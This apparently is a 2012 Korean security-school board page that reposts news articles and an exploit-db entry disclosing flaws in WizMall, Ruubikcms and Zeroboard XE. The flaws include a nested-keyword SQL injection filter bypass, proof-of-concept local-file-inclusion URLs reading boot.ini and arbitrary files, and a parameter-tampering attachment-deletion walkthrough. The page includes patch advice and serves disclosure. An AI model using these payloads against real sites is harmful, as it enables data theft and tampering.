i2sec " 정보보안 전문가 종합과정 8기 " 조민기씨의 0-Day ( 최신해킹기법 ) 발견을 축하드립니다.  자세한 최신해킹기법은 아래와 같습니다.http://www.exploit-db.com/exploits/18768/     
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 05:16----------------------------
 원문 : http://www.dailysecu.com/news_view.php?article_id=1842    
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 05:11----------------------------
 단어  사이에 단어를 넣으면 우회 가능한 것으로 분석…패치필요!    국내 유명 쇼핑몰 템플릿  ‘위즈몰’에 BLIND SQL 삽입 취약점이 발견되어 이용자들의 주의가 요구된다.    해당 취약점에 대해 문제  제기한 부산해킹보안교육센터(i2Sec) 수강생 신현우씨는 “분석해 본 결과,  소스코드에서 preg_replace 함수가 특정 단어만 두 번째 인자“”으로 바꿔버리는 기능을 한다.   그러므로 ‘ascii’을  ‘aasciiscii’ 식으로 단어 사이에 단어를 넣으면 우회가 가능한 것으로  분석됐다”고 밝혔다.        해당 취약점은 ascii,  substr, database 등 이런한 특정 단어 필터링을 우회할 수 있다는 것이다. 보안 대책으로는 reg_replace 함수의 두 번째  인자 값으로 “” 대신 다른 문자를 넣는 방법이다. 즉 특정 단어를 제거해버리는 것이 아니라 다른 문자로 대체해서 보안해야 한다.       이용자들은 해당  사이트(www.shop-wiz.com/board)에서 보안패치를 다운로드 후 적용해 취약점을 악용한 공격에  대비해야 한다.   [데일리시큐=길민권  기자]  [저작권자 ⓒ데일리시큐 무단 전재-재배포 금지]
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 05:08----------------------------
 부산  정보보안학원 수강생 최신해킹기법 뉴스 발표 !!             File Download, LFI, SQL  Injection 취약점…근본 문제 해결해야 국내에서 인지도가  높은 쇼핑몰  솔루션 위즈몰에 대한 최신 취약점이 다수  발견되었다.  이번 취약점은 File Download, LFI,  SQL Injection 등이다.    지난 18일 데일리시큐는  위즈몰에 대한 SQL Injection 취약점 관련  기사를 보도한 바 있다.  이에 추가적인 취약점이 발견돼  기술적인 부분을 구체적으로 보여주고 대응방안에 대해 공유하고자  한다.    취약점 정보 출처는  국제정보보안교육센터(i2Sec)다.     ◇File  Download        <파로스를 이용하여 요청 URL을  확인>     웹 프록시로 확인된 URL을 이용하여 전달되는  파라미터 값을 체크한다.   URL 요청 시 넘겨줄 파라미터가 어떠한 것들이  있는지 분석해 다른   파라미터 값을 전달하여 중요파일을 다운로드 하도록  한다.        변경된 패턴을 추가로 삽입하여 URL을  요청하였다.     < 패턴을 추가하여 URL요청 시 다운로드 창  활성화>      ◇File  Download 대응방안         Download.php 파일의 소스 코드 부분 중  URL 생성코드 부분이다.  URL 생성 시 어떠한 필터링 작업을 하지 않고  있다.      < filedownload 함수 소스코드 >   Filedownload  함수에서는 전달받은 파라미터를 필터링하는 부분 찾을 수 있다. 이번 취약점을  발표한 국제정보보안교육센터(i2Sec) 이창한 씨는 “대중화되어 있는  취약점에 대해서 관심과 신속한 대응이 이루어져야 한다”고 강조했다.   [데일리시큐=길민권  기자]   원문 : http://www.dailysecu.com/news_view.php?article_id=890
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 04:20----------------------------
  i2Sec " 정보보안 전문가 종합과정 5기 " 유상윤씨의 0-Day ( 최신해킹기법 )  발견을 축하드립니다. 자세한 최신해킹기법은 아래와  같습니다. http://www.exploit-db.com/exploits/17984/     # Exploit Title: [Ruubikcms v 1.1.0 (/extra/image.php) Local File Inclusion Vulnerability] # Date: [2011/10/16]  # Author: [Sangyun YOO]  # Software Link: [http://ruubikcms.com/ruubikcms/download.php?f=ruubikcms110.zip]  # Version: [Ruubikcms v 1.1.0] # Tested on: [Windows 7 Starter K]  -------------------------------------- source of /extra/image.php:  1: if (!isset($_GET["f"]) OR empty($_GET["f"])) die("Please specify 2: image."); 3: $fpath = BASE_DIR.$_GET["f"];  4: if (!is_file($fpath)) die("File does not exist.");  5:  6: // file size in bytes  7: // $fsize = filesize($fpath);  8:   9: // get mime type  10: $mtype = "";  11:  12: if (function_exists("mime_content_type")) {  13: $mtype = mime_content_type($fpath);  14: } elseif (function_exists("finfo_file")) {  15: $finfo = finfo_open(FILEINFO_MIME); // return mime type  16: $mtype = finfo_file($finfo, $fpath);  17: finfo_close($finfo);  18: }  19:  20: if ($mtype == "") {  21: $mtype = "image/jpeg";  22: }  23:  24: header("Content-type: $mtype");  25: readfile($fpath); <--------------------- LFI   proof of concept: http://[attacked_box]/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../boot.ini http://[attacked_box]/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../[localfile] 
-------------------------------------------------------------이름: 관리자, 날짜: 2012.07.31 03:27----------------------------
 국내 보드 취약점 공개…보안성 강화  필요!       Zeroboard XE, Technote7, RGBOARD는 국내에서 가장 많이 사용되는 보드들이다. 부산  국제정보보안센터는 “인터넷을 사용해본 사용자라면 한번씩은 사용했던 보드들의 취약점을 발견했다”고 발표했다.연구과정을 통해 밝혀진  취약점 항목은 아래와 같다.패치가  완료되지 않은 취약점들은 현재 공개될 수 없기에 패치가 완료된 취약점에 대해서만 살펴보도록 하자.◇Zeroboard XE –  Session Managerment vulnerabilityes게시판의 관리자는 admin으로 게시물을 남긴다.게시물  안의 첨부된 파일을 확인하며 상태 표시줄에 나타나는 file_srl = 96을 확인한다. 이 번호는 게시물의 File Uploading 되어  저장되는 순서를 나타내는 번호이다.공격자는 자신의  ID로 로그인한 뒤 게시판에 게시물을 작성한다.작성한  게시물에 첨부 파일을 Uploading시킨 후 file_srl=99 번호를 확인 한다.공격자는 자신의  게시물을 수정하면서 게시물의 첨부파일 삭제를 누르고 Paros를 이용하여   부분을 96번으로 수정하여 서버에  보낸다. 등록을 눌러 게시물의 수정을 끝낸 뒤 다시 게시판의 목록 창으로 돌아와 관리자의 게시물을 확인한다. 관리자의 게시물에 첨부파일이 지워진 것을 확인 할 수 있으며 공격자의 게시물에는 아무 변화가 없는 것을 확인할 수  있다.Session  Exploit을 이용하면 중요 권고사항이나 특정유저에게만 다운받도록 올려진 첨부파일을 임의 삭제가 가능하기 때문에 ISP 업체 및 웹 서버  관리자들의 신속한 패치가 필요하다. -패치 다운로드: www.xpressengine.com/blog/textyle/19908721 이번  취약점을 발표한 i2Sec 교육생 김천수군은 “모든 어플리케이션에는 취약점이 존재하고 있지만 초-중-고-대학교 과정처럼 정규적으로 전문가들을  양성할 수 있는 교육기관이 많지 않다”며 “더욱이 금전적인 이익을 목적으로 하는 크래커들이 화이트해커보다 더욱 활발한 활동을 하고 있기 때문에  최근에 일어났던 해킹사고와 같이 피해가 속출하는 것 같다. 기업의 보안의식 제고와 올바른 교육을 할 수 있는 교육기관에 대한 정부의 지원이 더욱  필요한 것 같다”고 말했다. [국제정보보안센터 ii@i2sec.co.kr][저작권자 ⓒ데일리시큐 무단 전재-재배포  금지]
------------------------------------------------------